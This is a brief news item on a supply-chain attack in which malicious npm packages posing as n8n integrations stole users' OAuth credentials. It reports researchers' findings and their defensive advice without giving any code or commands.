n8n Nodes Compromised by Malicious npm Package

Hackers have compromised n8n nodes by exploiting a weaponized npm package posing as a legitimate Google Ads integration. The malicious package mimicked authentic functionality, tricking developers into entering their OAuth credentials. Once input, the data was exfiltrated to an attacker-controlled server during routine workflow execution.

Researchers at EndorLabs uncovered eight malicious packages targeting the automation platform. One malicious package logged over 3,400 weekly downloads before its removal. The incident underscores how third-party integrations in workflow platforms can expose sensitive credentials, especially when nodes gain full operating system access and trust permissions.

Since n8n stores tokens for services like Google Ads and Salesforce in a central credential vault, a single compromised node can jeopardize multiple systems. EndorLabs advises using official packages, monitoring network traffic, and limiting service account privileges. With n8n nodes compromised through supply chain manipulation, threat actors continue refining tactics against automation ecosystems.

Read the full report at https://cybersecuritynews.com/n8ns-community-weaponized-npm-package/